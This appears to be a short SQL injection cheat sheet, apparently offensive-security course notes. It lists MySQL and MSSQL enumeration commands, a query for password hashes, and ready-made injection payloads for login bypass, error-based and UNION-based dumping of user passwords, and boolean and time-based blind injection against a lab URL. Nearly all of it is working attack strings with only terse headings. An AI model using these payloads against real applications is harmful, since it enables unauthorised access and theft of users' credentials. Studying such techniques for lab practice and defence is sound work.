Published on March 24, 2025
# Connect to MySQL
mysql -u root -p'root' -h <host> -P 3306
# Version & current user
SELECT version();
SELECT system_user();
# Databases and credentials
SHOW DATABASES;
SELECT user, authentication_string FROM mysql.user WHERE user='offsec';# Connect via Impacket
impacket-mssqlclient <user>:<pass>@<host> -windows-auth
# Version & DB details
SELECT @@version;
SELECT name FROM sys.databases;
# Tables and data
SELECT * FROM offsec.information_schema.tables;
SELECT * FROM offsec.dbo.users;# Bypass login
offsec' OR 1=1 -- //
# Extract version
' or 1=1 in (select @@version) -- //
# Dump all users
' OR 1=1 in (SELECT * FROM users) -- //
# Get only passwords
' or 1=1 in (SELECT password FROM users) -- //
# Get admin password
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //# Append SELECT output
UNION
# Conditions for UNION SQLi
1. Matching column count
2. Compatible data types
# Test column count
' ORDER BY 1-- //
# Visible columns (5)
%' UNION SELECT 'a1', 'a2', 'a3', 'a4', 'a5' -- //
# Enumerate DB info
%' UNION SELECT database(), user(), @@version, null, null -- //
# Avoid string-integer mismatch
' UNION SELECT null, null, database(), user(), @@version -- //
# List tables & columns
' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //
# Dump user data
' UNION SELECT null, username, password, description, null FROM users -- //# What is Blind SQLi?
Exploiting SQL without seeing direct output.
# Types:
1. Boolean-based
2. Time-based
# Boolean example:
http://192.168.50.16/blindsqli.php?user=offsec' AND 1=1 -- //
# Time-based example:
http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- //